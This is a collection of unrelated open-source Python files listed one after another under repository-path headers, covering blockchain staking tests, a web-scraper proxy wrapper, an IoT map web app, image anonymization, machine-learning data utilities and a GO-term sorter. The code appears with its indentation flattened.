tx_for_n4 = self.create_tx_with_output_amounts(self.nodes[0].listunspent(), addresses_vs_amounts_node3)
signed_tx_for_n4 = self.nodes[0].signrawtransaction(tx_for_n4)
self.nodes[0].sendrawtransaction(signed_tx_for_n4['hex'])
# we stake a few blocks in nodes[0] to reach block maturity before
blocks_to_stake = 40 * 2
assert block_count_to_stake * STAKE_TARGET_SPACING < STAKE_SPLIT_AGE
for _ in range(blocks_to_stake): # 80 blocks = 80 * 30 = 40 minutes
hash_n0 = self.gen_pos_block(0)
self.sync_all()
n4_balance_to_stake = Decimal('2000')
assert_equal(self.nodes[4].getbalance(), n4_balance_to_stake)
hash_n4 = self.gen_pos_block(4)
staked_block_in_n4 = self.nodes[4].getblock(hash_n4, True, True)
# 1 input should be split into two outputs because stake time is less than nStakeSplitAge
assert_equal(len(staked_block_in_n4['tx'][1]['vin']), 1)
assert_equal(len(staked_block_in_n4['tx'][1]['vout']), 3) # 1 empty output + 2 split outputs
assert_equal(staked_block_in_n4['tx'][1]['vout'][0]['value'], Decimal('0'))
assert_equal(staked_block_in_n4['tx'][1]['vout'][1]['value'], n4_balance_to_stake/2)
assert Decimal('1000') < staked_block_in_n4['tx'][1]['vout'][2]['value'] < Decimal('1001')
self.sync_all()
assert n2_balance_before < self.nodes[2].getbalance()
# TODO: determine rewards while staking
# the balance can never be determined because times are random
# assert_equal(self.nodes[1].getbalance(), Decimal("110001.30160111"))
# assert_equal(self.nodes[2].getbalance(), Decimal("1100.08679167"))
# assert_equal(self.nodes[3].getbalance(), Decimal("120"))
if __name__ == '__main__':
RawTransactionsTest().main()
|
zhihuAnswerSpider/spider/Proxy_pool.py | takhello/spider_collection | 106 | 12670824 | import requests
import yaml
import os
'''特别鸣谢项目:https://github.com/jhao104/proxy_pool 提供的代理池服务'''
'''这个类主要使用来对上述项目接口的进一步封装以方便调用'''
StopEvent = object()
class Proxy_pool():
# 默认本机ip,端口是https://github.com/jhao104/proxy_pool项目的默认端口。
host="127.0.0.1"
port="5010"
def __init__(self):
config=open(os.getcwd()+"\\config.yaml",mode="r",encoding="utf-8")
cfg=config.read()
yaml_line=yaml.load(stream=cfg,Loader=yaml.FullLoader)
self.host=yaml_line["host"]
self.port=yaml_line["port"]
def get_proxy(self):
return requests.get("http://{host}:{port}/get/".format(host=self.host,port=self.port)).json()
def delete_proxy(self,proxy):
requests.get("http://{host}:{port}/delete/?proxy={}".format(host=self.host,port=self.port,proxy=proxy))
# your spider code
def get_response(self,url,headers,https=False,cookie="",retry_count=5):
if https:
is_https=self.get_proxy().get("https")
print(is_https)
proxy = self.get_proxy().get("proxy")
while retry_count > 0:
try:
response = requests.get(url=url,headers=headers,cookies=cookie, proxies={"http": "http://{}".format(proxy)})
# 使用代理访问
return response
except Exception:
retry_count -= 1
# 删除代理池中代理
self.delete_proxy(proxy)
return response
def post_response(self,url,headers,cookie,data,retry_count=5):
proxy = self.get_proxy().get("proxy")
while retry_count > 0:
try:
response = requests.post(url=url,headers=headers,data=data,cookies=cookie, proxies={"http": "http://{}".format(proxy)})
# 使用代理访问
return response
except Exception:
retry_count -= 1
# 删除代理池中代理
self.delete_proxy(proxy)
return response
|
labs/iot/gps-lab/code/web-app/app.py | chagen24/iot-curriculum | 126 | 12670900 | import os
from flask import Flask, render_template
from azure.eventhub import EventHubConsumerClient
from flask_socketio import SocketIO
from threading import Thread
# Load the environment variables
maps_key = os.environ["MAPS_KEY"]
connection_string = os.environ["CONNECTION_STRING"]
consumer_group_name = "$Default"
# Create the website with Flask
app = Flask(__name__)
# Create a secret key to keep the client side socket.io sessions secure.
# We are generating a random 24 digit Hex Key.
app.config["SECRET_KEY"] = os.urandom(24)
# Create the socket.io app
socketio = SocketIO(app, async_mode="threading")
thread = Thread()
# When a message is received from IoT hub, broadcast it to all clients that are listening through socket
def on_event_batch(partition_context, events):
# Loop through all the events on the event hub - each event is a message from IoT Hub
for event in events:
# Send the event over the socket
socketio.emit("mapdata", {"data": event.body_as_str()}, namespace="/get_data", broadcast=True)
# Update the event hub checkpoint so we don't get the same messages again if we reconnect
partition_context.update_checkpoint()
# A background method that is triggered by socket.io. This method connects to the Event Hub compatible endpoint
# on the IoT Hub and listens for messages
def event_hub_task():
# Create the event hub client to receive messages from IoT hub
client = EventHubConsumerClient.from_connection_string(
conn_str=connection_string,
consumer_group=consumer_group_name
)
# Set up the batch receiving of messages
with client:
client.receive_batch(on_event_batch=on_event_batch)
# This method is called when a request comes in for the root page
@app.route("/")
def root():
# Create data for the home page to pass the maps key
data = { "maps_key" : maps_key }
# Return the rendered HTML page
return render_template("index.html", data = data)
# This is called when the socket on the web page connects to the socket.
# This starts a background thread that listens on the event hub
@socketio.on("connect", namespace="/get_data")
def socketio_connect():
global thread
print("Client connected")
# If the thread is not already running, start it as a socket.io background task to
# listen on messages from IoT Hub
if not thread.is_alive():
thread = socketio.start_background_task(event_hub_task)
# The main method - if this app is run via the command line, it starts the socket.io app.
def main():
socketio.run(app)
if __name__ == "__main__":
main()
|
tests/matchers.py | mattdricker/lms | 113 | 12670927 | """Objects that compare equal to other objects for testing."""
from h_matchers import Any
from pyramid.response import Response
def temporary_redirect_to(location):
"""Return a matcher for any `HTTP 302 Found` redirect to the given URL."""
return Any.instance_of(Response).with_attrs(
{"status_code": 302, "location": location}
)
|
src/main/anonymization/detection_anonymization.py | BMW-InnovationLab/BMW-Anonymization-API | 108 | 12670950 | <filename>src/main/anonymization/detection_anonymization.py
from anonymization.base_anonymization import BaseAnonymization
from PIL import ImageFilter, Image
def find_boxes(bbox):
nb = []
for i in bbox:
nb.append(i)
return nb
class DetectionAnonymization(BaseAnonymization):
def __init__(self):
pass
def blurring(self, image, response, degree=None, id=None, mask=None):
"""
Blur the detected objects based on the user's requirements
:param image: input image
:param response: The response parsed from the object detection api
:param degree: The degree of the anonymization (specified in the user_configuration file)
:param id:
:param mask:
:return: The anonymized image
"""
boxes = find_boxes(response)
for i in boxes:
cropped_image = image.crop((i[0], i[1], i[2], i[3]))
blurred_image = cropped_image.filter(ImageFilter.GaussianBlur(25*float(degree)))
image.paste(blurred_image, (i[0], i[1], i[2], i[3]))
return image
def pixelating(self, image, response, degree=None, id=None, mask=None):
"""
Pixelate the detected objects based on the user's requirements
:param image: input image
:param response: The response parsed from the object detection api
:param degree: The degree of the anonymization (specified in the user_configuration file)
:param id:
:param mask:
:return: The anonymized image
"""
boxes = find_boxes(response)
for i in boxes:
cropped_image = image.crop((i[0], i[1], i[2], i[3]))
w, h = cropped_image.size
small = cropped_image.resize((int(w / (float(degree) * w)), int(h / (float(degree) * h))), Image.BILINEAR)
result = small.resize(cropped_image.size, Image.NEAREST)
image.paste(result, (i[0], i[1], i[2], i[3]))
return image
def blackening(self, image, response, degree=None, id=None, mask=None):
"""
Blacken the detected objects based on the user's requirements
:param image: input image
:param response: The response parsed from the object detection api
:param degree: The degree of the anonymization (specified in the user_configuration file)
:param id:
:param mask:
:return: The anonymized image
"""
boxes = find_boxes(response)
for i in boxes:
cropped = image.crop((i[0], i[1], i[2], i[3]))
h, w = cropped.size
black = Image.new(str(image.mode), (h, w), 'black')
result = Image.blend(cropped, black, float(degree))
cropped.paste(result)
image.paste(cropped, (i[0], i[1], i[2], i[3]))
return image
|
verde/tests/utils.py | fatiando/verde | 415 | 12670973 | # Copyright (c) 2017 The Verde Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
#
# This code is part of the Fatiando a Terra project (https://www.fatiando.org)
#
"""
Testing utilities.
"""
import pytest
try:
import numba
except ImportError:
numba = None
def requires_numba(function):
"""
Skip the decorated test if numba is not installed.
"""
mark = pytest.mark.skipif(numba is None, reason="requires numba")
return mark(function)
|
Sources/Workflows/XLixian/iambus-xunlei-lixian/lixian_cli_parser.py | yagosys/AlfredWorkflow.com | 2,177 | 12670974 |
def expand_windows_command_line(args):
from glob import glob
expanded = []
for x in args:
try:
xx = glob(x)
except:
xx = None
if xx:
expanded += xx
else:
expanded.append(x)
return expanded
def expand_command_line(args):
import platform
return expand_windows_command_line(args) if platform.system() == 'Windows' else args
def parse_command_line(args, keys=[], bools=[], alias={}, default={}, help=None):
args = expand_command_line(args)
options = {}
for k in keys:
options[k] = None
for k in bools:
options[k] = None
left = []
args = args[:]
while args:
x = args.pop(0)
if x == '--':
left.extend(args)
break
if x.startswith('-'):
k = x.lstrip('-')
if k in bools:
options[k] = True
elif k.startswith('no-') and k[3:] in bools:
options[k[3:]] = False
elif k in keys:
options[k] = args.pop(0)
elif '=' in k and k[:k.index('=')] in keys:
options[k[:k.index('=')]] = k[k.index('=')+1:]
elif k in alias:
k = alias[k]
if k in bools:
options[k] = True
else:
options[k] = args.pop(0)
else:
if help:
print 'Unknown option ' + x
print
print help
exit(1)
else:
raise RuntimeError('Unknown option '+x)
else:
left.append(x)
for k in default:
if options[k] is None:
options[k] = default[k]
class Args(object):
def __init__(self, args, left):
self.__dict__['_args'] = args
self.__dict__['_left'] = left
def __getattr__(self, k):
v = self._args.get(k, None)
if v:
return v
if '_' in k:
return self._args.get(k.replace('_', '-'), None)
def __setattr__(self, k, v):
self._args[k] = v
def __getitem__(self, i):
if type(i) == int:
return self._left[i]
else:
return self._args[i]
def __setitem__(self, i, v):
if type(i) == int:
self._left[i] = v
else:
self._args[i] = v
def __len__(self):
return len(self._left)
def __str__(self):
return '<Args%s%s>' % (self._args, self._left)
return Args(options, left)
|
min-char-rnn/markov-model.py | eliben/deep-learning-samples | 183 | 12670978 | # Simple n-gram (Markov chain) model for character-based text generation.
#
# Only tested with Python 3.6+
#
# <NAME> (http://eli.thegreenplace.net)
# This code is in the public domain
from __future__ import print_function
from collections import defaultdict, Counter
import random
import sys
# This is the length of the "state" the current character is predicted from.
# For Markov chains with memory, this is the "order" of the chain. For n-grams,
# the n is STATE_LEN+1 since it includes the predicted character as well.
STATE_LEN = 4
def weighted_from_counter(c):
total = sum(c.values())
idx = random.randrange(total)
for elem, count in c.most_common():
idx -= count
if idx < 0:
return elem
def main():
filename = sys.argv[1]
with open(filename, 'r') as f:
data = f.read()
states = defaultdict(Counter)
print('Learning model...')
for i in range(len(data) - STATE_LEN - 1):
state = data[i:i + STATE_LEN]
next = data[i + STATE_LEN]
states[state][next] += 1
print('Model has {0} states'.format(len(states)))
j = 0
for k, v in states.items():
print(k, v)
if j > 9:
break
j += 1
print('Sampling...')
state = random.choice(list(states))
sys.stdout.write(state)
for i in range(200):
nextc = weighted_from_counter(states[state])
sys.stdout.write(nextc)
state = state[1:] + nextc
print()
if __name__ == '__main__':
main()
|
kur/sources/text.py | greedyuser/kur | 867 | 12670996 | <gh_stars>100-1000
import linecache
import numpy
import json
from ..sources import ChunkSource, DerivedSource
###############################################################################
class TextLength(DerivedSource):
""" Data source for audio lengths.
"""
def __init__(self, source, num_entries):
super().__init__()
self.source = source
self.num_entries = num_entries
def derive(self, inputs):
text_chunks, = inputs
return numpy.array([[len(x)] for x in text_chunks], dtype='int32')
def shape(self):
return (1,)
def requires(self):
return (self.source, )
def __len__(self):
return self.num_entries
###############################################################################
class TextSource(DerivedSource):
""" Data source for neat (non-ragged) one-hot represented text arrays.
"""
def __init__(self, source, vocab, num_entries, seq_len, padding='right', pad_with=None):
super().__init__()
self.num_entries = num_entries
self.source = source
self.seq_len = seq_len
self.padding = padding
self.pad_with = pad_with
self.vocab = vocab
self.char_to_int = {
c: i
for i, c in enumerate(self.vocab)
}
def _encode(self, char_seq):
output = numpy.zeros(shape=(len(char_seq), len(self.vocab),))
for i in range(len(char_seq)):
output[i][self.char_to_int[char_seq[i]]] = 1
assert output.shape[0] == len(char_seq)
return output
def derive(self, inputs):
text_chunk, = inputs
output = numpy.zeros(
shape=(
len(text_chunk),
self.seq_len,
len(self.vocab),
),
dtype='int32'
)
for i, char_seq in enumerate(text_chunk):
char_seq = list(char_seq)
if self.padding == 'right':
if self.pad_with is not None:
char_seq = char_seq + (self.seq_len - len(char_seq)) * [self.pad_with]
encoded_char_seq = self._encode(char_seq)
assert len(encoded_char_seq) == len(char_seq)
for j in range(len(encoded_char_seq)):
output[i][j] = encoded_char_seq[j]
elif self.padding == 'left':
if self.pad_with is not None:
char_seq = (self.seq_len - len(char_seq)) * [self.pad_with] + char_seq
encoded_char_seq = self._encode(char_seq)
assert len(encoded_char_seq) == len(char_seq)
for j in range(len(encoded_char_seq)):
output[i][-len(char_seq) + j] = encoded_char_seq[j]
else:
raise ValueError('Padding must be left or right, not %s' % padding)
return output
def shape(self):
""" Return the shape of the tensor (excluding batch size) returned by
this data source.
"""
return (self.seq_len, len(self.vocab),)
def requires(self):
return (self.source, )
def __len__(self):
return self.num_entries
###############################################################################
class RawText(ChunkSource):
""" Data source for text stored in JSONL format like:
['a', 'p', 'p', 'l', 'e', ' ', 'p', 'i', 'e']
"""
###########################################################################
@classmethod
def default_chunk_size(cls):
""" Returns the default chunk size for this source.
"""
return 256
###########################################################################
def shape(self):
return (None,)
###########################################################################
def __init__(self, source, key, num_entries, *args, **kwargs):
""" Creates a new Text source for file named `source`.
"""
super().__init__(*args, **kwargs)
self.source = source
self.num_entries = num_entries
self.key = key
self.indices = numpy.arange(len(self))
###########################################################################
def __iter__(self):
""" Return an iterator to the data. Yield the value for self.key
from each object
"""
start = 0
while start < self.num_entries:
end = min(self.num_entries, start + self.chunk_size)
# linecache line numbering starts at 1
batch = [
json.loads(
linecache.getline(
self.source,
i + 1
).strip()
)[self.key]
for i in self.indices[start:end]
]
yield batch
start = end
###########################################################################
def __len__(self):
""" Returns the total number of entries that this source can return, if
known.
"""
return self.num_entries
###########################################################################
def can_shuffle(self):
""" This source can be shuffled.
"""
return True
###########################################################################
def shuffle(self, indices):
""" Applies a permutation to the data.
"""
if len(indices) > len(self):
raise ValueError('Shuffleable was asked to apply permutation, but '
'the permutation is longer than the length of the data set.')
self.indices[:len(indices)] = self.indices[:len(indices)][indices]
|
tests/helpers/test_bbox_helper.py | wqliu657/DSNet | 113 | 12671019 | <gh_stars>100-1000
import numpy as np
from helpers import bbox_helper
def test_lr2cw():
lr_bbox = np.array([[1, 3], [2, 7], [19, 50]])
output = bbox_helper.lr2cw(lr_bbox)
answer = np.array([[2, 2], [4.5, 5], [34.5, 31]])
assert np.isclose(output, answer).all()
lr_bbox = np.array([[1.25, 2.75], [1.485, 3.123]])
output = bbox_helper.lr2cw(lr_bbox)
answer = np.array([[2, 1.5], [2.304, 1.638]])
assert np.isclose(output, answer).all()
def test_cw2lr():
cw_bbox = np.array([[2, 8], [6, 7]])
output = bbox_helper.cw2lr(cw_bbox)
answer = np.array([[-2, 6], [2.5, 9.5]])
assert np.isclose(output, answer).all()
cw_bbox = np.array([[1.524, 9.428], [4.518, 1.025]])
output = bbox_helper.cw2lr(cw_bbox)
answer = np.array([[-3.19, 6.238], [4.0055, 5.0305]])
assert np.isclose(output, answer).all()
def test_seq2bbox():
sequence = np.array([0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1])
output = bbox_helper.seq2bbox(sequence)
answer = [[1, 5], [8, 10], [15, 18]]
assert np.isclose(output, answer).all()
assert not bbox_helper.seq2bbox(np.array([0, 0, 0])).any()
assert not bbox_helper.seq2bbox(np.array([])).any()
class TestIou(object):
def setup(self):
self.anchor_lr = np.array(
[[1, 5], [1, 5], [1, 5], [1, 5], [1, 5]], dtype=np.float32)
self.target_lr = np.array(
[[1, 5], [0, 6], [2, 4], [3, 8], [8, 9]], dtype=np.float32)
self.anchor_cw = bbox_helper.lr2cw(self.anchor_lr)
self.target_cw = bbox_helper.lr2cw(self.target_lr)
self.answer = np.array([1, 4 / 6, 2 / 4, 2 / 7, 0])
def test_iou_lr(self):
output = bbox_helper.iou_lr(self.anchor_lr, self.target_lr)
assert np.isclose(output, self.answer).all()
def test_iou_cw(self):
output = bbox_helper.iou_cw(self.anchor_cw, self.target_cw)
assert np.isclose(output, self.answer).all()
def test_nms():
scores = np.array([0.9, 0.8, 0.7, 0.6])
bboxes = np.array([[1, 5], [2, 4], [4, 8], [5, 9]])
keep_scores, keep_bboxes = bbox_helper.nms(scores, bboxes, 0.5)
ans_scores = [0.9, 0.7]
ans_bboxes = [[1, 5], [4, 8]]
assert np.isclose(keep_scores, ans_scores).all()
assert np.isclose(keep_bboxes, ans_bboxes).all()
|
django_loci/channels/consumers.py | Purhan/django-loci | 205 | 12671042 | <reponame>Purhan/django-loci<filename>django_loci/channels/consumers.py<gh_stars>100-1000
from ..models import Location
from .base import BaseLocationBroadcast
class LocationBroadcast(BaseLocationBroadcast):
model = Location
|
src/gausskernel/dbmind/tools/ai_server/main.py | Yanci0/openGauss-server | 360 | 12671050 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#############################################################################
# Copyright (c): 2021, Huawei Tech. Co., Ltd.
# FileName : main.py
# Version :
# Date : 2021-4-7
# Description : Function entry file
#############################################################################
try:
import sys
import os
import argparse
sys.path.insert(0, os.path.dirname(__file__))
from common.utils import Common, CONFIG_PATH
from common.logger import CreateLogger
except ImportError as err:
sys.exit("main.py: Failed to import module: %s." % str(err))
LOGGER = CreateLogger("debug", "start_service.log").create_log()
current_dirname = os.path.dirname(os.path.realpath(__file__))
__version__ = '1.0.0'
__description__ = 'anomaly_detection: anomaly detection tool.'
__epilog__ = """
epilog:
the 'a-detection.conf' will be read when the program is running,
the location of them is:
dbmind.conf: {detection}.
""".format(detection=CONFIG_PATH)
def usage():
usage_message = """
# start service.
python main.py start [--role {{agent,server}}]
# stop service.
python main.py stop [--role {{agent,server}}]
"""
return usage_message
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description=__description__,
usage=usage(),
epilog=__epilog__)
parser.add_argument('mode', choices=['start', 'stop'])
parser.add_argument('--role', choices=['agent', 'server'],
help="Run as 'agent', 'server'. "
"notes: ensure the normal operation of the openGauss in agent.")
parser.add_argument('-v', '--version', action='version')
parser.version = __version__
return parser.parse_args()
def manage_service(args):
server_pid_file = os.path.join(current_dirname, './tmp/server.pid')
agent_pid_file = os.path.join(current_dirname, './tmp/agent.pid')
if args.role == 'server':
from service.my_app import MyApp
if args.mode == 'start':
MyApp(server_pid_file, LOGGER).start_service(CONFIG_PATH)
else:
MyApp(server_pid_file, LOGGER).stop_service()
elif args.role == 'agent':
from agent.manage_agent import Agent
if args.mode == 'start':
get_data_path = "ps -ux | grep -v grep | grep gaussdb"
std, _ = Common.execute_cmd(get_data_path)
if not std:
raise Exception("The GaussDb process does not exists, please check it.")
Agent(agent_pid_file, LOGGER).start_agent(CONFIG_PATH)
else:
Agent(agent_pid_file, LOGGER).stop_agent()
else:
print('FATAL: incorrect parameter.')
print(usage())
return -1
def main():
args = parse_args()
if args.mode in ('start', 'stop') and args.role:
try:
manage_service(args)
except Exception as err_msg:
print(err_msg)
sys.exit(1)
else:
print("FATAL: incorrect parameter.")
print(usage())
return -1
if __name__ == '__main__':
main()
|
goatools/grouper/sorter.py | flying-sheep/goatools | 477 | 12671052 | """Sorts GO IDs or user-provided sections containing GO IDs."""
__copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved."
__author__ = "<NAME>"
import sys
import collections as cx
from goatools.wr_tbl import prt_txt
from goatools.grouper.sorter_nts import SorterNts
from goatools.grouper.sorter_gos import SorterGoIds
from goatools.grouper.wr_sections import WrSectionsTxt
class Sorter(object):
"""Sorts GO IDs or user-provided sections containing GO IDs.
User GO IDs grouped under header GO IDs are not sorted by the Grouper class.
Sort both user GO IDs in a group and header GO IDs across groups with these:
S: use_sections
s: section_sortby (T=True, F=False, S=lambda sort function)
h: hdrgo_sortby Sorts hdr GO IDs
u: sortby Sorts user GO IDs
P: hdrgo_prt If True, Removes GO IDs used as GO group headers; Leaves list in
sorted order, but removes header GO IDs which are not user GO IDs.
rm_h hdr_sort usr_sort S s h u p
--- ------------ ------------ -- -- -- -- --
case 1: NO hdrgo_sortby usrgo_sortby N T H U T
case 2: YES hdrgo_sortby usrgo_sortby N T H U F
case 3: NO section_order usrgo_sortby S F - U T
case 4: YES section_order usrgo_sortby S F - U F
case 5: YES |<--- section_sortby --->| S S - - -
|print|
sec usesec prthdr prtsec 1d 2d hdr usr
---- ------ ------ ------ -- -- --- ---
none - true - y . hdr usr A
none - false - y . ... usr B
yes False true - y . hdr usr A
yes False false - y . ... usr B
yes True True False . y hdr usr
yes True False False . y ... usr
"""
# Keywords for creating desc2nts
keys_nts = set(["hdrgo_prt", "section_prt", "top_n", "use_sections"])
def __init__(self, grprobj, **kws):
# Keyword arguments:
_sortby = kws.get('sortby')
_hdrgo_sortby = kws.get('hdrgo_sortby')
_section_sortby = kws.get('section_sortby')
# GO IDs are grouped, but not yet sorted
# print('SSSSSSSSSSS Sorter(sortby={} hdrgo_sortby={}, section_sortby={}'.format(
# _sortby, _hdrgo_sortby, _section_sortby))
self.grprobj = grprobj
# SorterGoIds can return either a 2-D list of sorted GO IDs or a flat sorted GO list
self.sortgos = SorterGoIds(grprobj, _sortby, _hdrgo_sortby)
self.sectobj = SorterNts(self.sortgos, _section_sortby) if grprobj.hdrobj.sections else None
def prt_gos(self, prt=sys.stdout, **kws_usr):
"""Sort user GO ids, grouped under broader GO terms or sections. Print to screen."""
# deprecated
# Keyword arguments (control content): hdrgo_prt section_prt use_sections
# desc2nts contains: (sections hdrgo_prt sortobj) or (flat hdrgo_prt sortobj)
desc2nts = self.get_desc2nts(**kws_usr)
# Keyword arguments (control print format): prt prtfmt
self.prt_nts(desc2nts, prt, kws_usr.get('prtfmt'))
return desc2nts
def prt_nts(self, desc2nts, prt=sys.stdout, prtfmt=None):
"""Print grouped and sorted GO IDs."""
# deprecated
# Set print format string
if prtfmt is None:
prtfmt = "{{hdr1usr01:2}} {FMT}\n".format(FMT=self.grprobj.gosubdag.prt_attr['fmt'])
# 1-D: data to print is a flat list of namedtuples
if 'flat' in desc2nts:
prt_txt(prt, desc2nts['flat'], prtfmt=prtfmt)
# 2-D: data to print is a list of [(section, nts), ...
else:
WrSectionsTxt.prt_sections(prt, desc2nts['sections'], prtfmt)
def get_desc2nts(self, **kws_usr):
"""Return grouped, sorted namedtuples in either format: flat, sections."""
# desc2nts contains: (sections hdrgo_prt sortobj) or (flat hdrgo_prt sortobj)
# keys_nts: hdrgo_prt section_prt top_n use_sections
kws_nts = {k:v for k, v in kws_usr.items() if k in self.keys_nts}
return self.get_desc2nts_fnc(**kws_nts)
def get_desc2nts_fnc(self, hdrgo_prt=True, section_prt=None,
top_n=None, use_sections=True):
"""Return grouped, sorted namedtuples in either format: flat, sections."""
# RETURN: flat list of namedtuples
nts_flat = self.get_nts_flat(hdrgo_prt, use_sections)
if nts_flat:
flds = nts_flat[0]._fields
if not use_sections:
return {'sortobj':self, 'flat' : nts_flat, 'hdrgo_prt':hdrgo_prt, 'flds':flds,
'num_items':len(nts_flat), 'num_sections':1}
else:
return {'sortobj':self,
'sections' : [(self.grprobj.hdrobj.secdflt, nts_flat)],
'hdrgo_prt':hdrgo_prt,
'flds':flds,
'num_items':len(nts_flat), 'num_sections':1}
# print('FFFF Sorter:get_desc2nts_fnc: nts_flat is None')
# RETURN: 2-D list [(section_name0, namedtuples0), (section_name1, namedtuples1), ...
# kws: top_n hdrgo_prt section_sortby
# Over-ride hdrgo_prt depending on top_n value
assert top_n is not True and top_n is not False, \
"top_n({T}) MUST BE None OR AN int".format(T=top_n)
assert self.sectobj is not None, "SECTIONS OBJECT DOES NOT EXIST"
sec_sb = self.sectobj.section_sortby
# Override hdrgo_prt, if sorting by sections or returning a subset of GO IDs in section
hdrgo_prt_curr = hdrgo_prt is True
if sec_sb is True or (sec_sb is not False and sec_sb is not None) or top_n is not None:
hdrgo_prt_curr = False
# print('GGGG Sorter:get_desc2nts_fnc: hdrgo_prt_curr({}) sec_sb({}) top_n({})'.format(
# hdrgo_prt_curr, sec_sb, top_n))
nts_section = self.sectobj.get_sorted_nts_keep_section(hdrgo_prt_curr)
# print('HHHH Sorter:get_desc2nts_fnc: nts_section')
# Take top_n in each section, if requested
if top_n is not None:
nts_section = [(s, nts[:top_n]) for s, nts in nts_section]
if section_prt is None:
nts_flat = self.get_sections_flattened(nts_section)
flds = nts_flat[0]._fields if nts_flat else []
return {'sortobj':self, 'flat' : nts_flat, 'hdrgo_prt':hdrgo_prt_curr, 'flds':flds,
'num_items':len(nts_flat), 'num_sections':1}
# Send flat list of sections nts back, as requested
if section_prt is False:
nts_flat = self.get_sections_flattened(nts_section)
flds = nts_flat[0]._fields if nts_flat else []
return {'sortobj':self, 'flat' : nts_flat, 'hdrgo_prt':hdrgo_prt_curr, 'flds':flds,
'num_items':len(nts_flat),
'num_sections':len(nts_section)}
# Send 2-D sections nts back
# print('IIII Sorter:get_desc2nts_fnc: nts_section')
flds = nts_section[0][1][0]._fields if nts_section else []
return {'sortobj':self, 'sections' : nts_section, 'hdrgo_prt':hdrgo_prt_curr, 'flds':flds,
'num_items':sum(len(nts) for _, nts in nts_section),
'num_sections':len(nts_section)}
@staticmethod
def get_sections_flattened(section_nts):
"""Convert [(section0, nts0), (section1, nts1), ... to [*nts0, *nts1, ..."""
nt_flds = list(section_nts[0][1][0]._fields)
# Flatten section_nts 2-D list
if 'section' in nt_flds:
return [nt for _, nts in section_nts for nt in nts]
# Flatten section_nts 2-D list, and add sections to each namedtuple
nt_flds.append('section')
nts_flat = []
ntobj = cx.namedtuple("Nt", " ".join(nt_flds))
for section_name, nts in section_nts:
for nt_go in nts:
vals = list(nt_go) + [section_name]
nts_flat.append(ntobj._make(vals))
return nts_flat
def get_nts_flat(self, hdrgo_prt=True, use_sections=True):
"""Return a flat list of sorted nts."""
# Either there are no sections OR we are not using them
if self.sectobj is None or not use_sections:
return self.sortgos.get_nts_sorted(
hdrgo_prt,
hdrgos=self.grprobj.get_hdrgos(),
hdrgo_sort=True)
if not use_sections:
return self.sectobj.get_sorted_nts_omit_section(hdrgo_prt, hdrgo_sort=True)
return None
@staticmethod
def get_fields(desc2nts):
"""Return grouped, sorted namedtuples in either format: flat, sections."""
if 'flat' in desc2nts:
nts_flat = desc2nts.get('flat')
if nts_flat:
return nts_flat[0]._fields
if 'sections' in desc2nts:
nts_sections = desc2nts.get('sections')
if nts_sections:
return nts_sections[0][1][0]._fields
# Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
|
Codeforces/Lucky Mask/solution.py | rsrahul1000/Hack-CP-DSA | 205 | 12671094 | # Function to calculate the mask of a number.
def split(n):
b = []
# Iterating the number by digits.
while n > 0:
# If the digit is lucky digit it is appended to the list.
if n % 10 == 4 or n % 10 == 7:
b.append(n % 10)
n //= 10
# Return the mask.
return b
# Input the two input values.
x, y = [int(x) for x in input().split()]
# Calculate the mask of 'y'.
a = split(y)
# Iterate for value greater than 'x'.
for i in range(x + 1, 1000000):
# If mask equals output the integer and break the loop.
if split(i) == a:
print(i)
break |
robomimic/scripts/split_train_val.py | akolobov/robomimic | 107 | 12671123 | """
Script for splitting a dataset hdf5 file into training and validation trajectories.
Args:
dataset (str): path to hdf5 dataset
filter_key (str): if provided, split the subset of trajectories
in the file that correspond to this filter key into a training
and validation set of trajectories, instead of splitting the
full set of trajectories
ratio (float): validation ratio, in (0, 1). Defaults to 0.1, which is 10%.
Example usage:
python split_train_val.py --dataset /path/to/demo.hdf5 --ratio 0.1
"""
import argparse
import h5py
import numpy as np
from robomimic.utils.file_utils import create_hdf5_filter_key
def split_train_val_from_hdf5(hdf5_path, val_ratio=0.1, filter_key=None):
"""
Splits data into training set and validation set from HDF5 file.
Args:
hdf5_path (str): path to the hdf5 file
to load the transitions from
val_ratio (float): ratio of validation demonstrations to all demonstrations
filter_key (str): if provided, split the subset of demonstration keys stored
under mask/@filter_key instead of the full set of demonstrations
"""
# retrieve number of demos
f = h5py.File(hdf5_path, "r")
if filter_key is not None:
print("using filter key: {}".format(filter_key))
demos = sorted([elem.decode("utf-8") for elem in np.array(f["mask/{}".format(filter_key)])])
else:
demos = sorted(list(f["data"].keys()))
num_demos = len(demos)
f.close()
# get random split
num_demos = len(demos)
num_val = int(val_ratio * num_demos)
mask = np.zeros(num_demos)
mask[:num_val] = 1.
np.random.shuffle(mask)
mask = mask.astype(int)
train_inds = (1 - mask).nonzero()[0]
valid_inds = mask.nonzero()[0]
train_keys = [demos[i] for i in train_inds]
valid_keys = [demos[i] for i in valid_inds]
print("{} validation demonstrations out of {} total demonstrations.".format(num_val, num_demos))
# pass mask to generate split
name_1 = "train"
name_2 = "valid"
if filter_key is not None:
name_1 = "{}_{}".format(filter_key, name_1)
name_2 = "{}_{}".format(filter_key, name_2)
train_lengths = create_hdf5_filter_key(hdf5_path=hdf5_path, demo_keys=train_keys, key_name=name_1)
valid_lengths = create_hdf5_filter_key(hdf5_path=hdf5_path, demo_keys=valid_keys, key_name=name_2)
print("Total number of train samples: {}".format(np.sum(train_lengths)))
print("Average number of train samples {}".format(np.mean(train_lengths)))
print("Total number of valid samples: {}".format(np.sum(valid_lengths)))
print("Average number of valid samples {}".format(np.mean(valid_lengths)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset",
type=str,
help="path to hdf5 dataset",
)
parser.add_argument(
"--filter_key",
type=str,
default=None,
help="if provided, split the subset of trajectories in the file that correspond to\
this filter key into a training and validation set of trajectories, instead of\
splitting the full set of trajectories",
)
parser.add_argument(
"--ratio",
type=float,
default=0.1,
help="validation ratio, in (0, 1)"
)
args = parser.parse_args()
# seed to make sure results are consistent
np.random.seed(0)
split_train_val_from_hdf5(args.dataset, val_ratio=args.ratio, filter_key=args.filter_key)
|
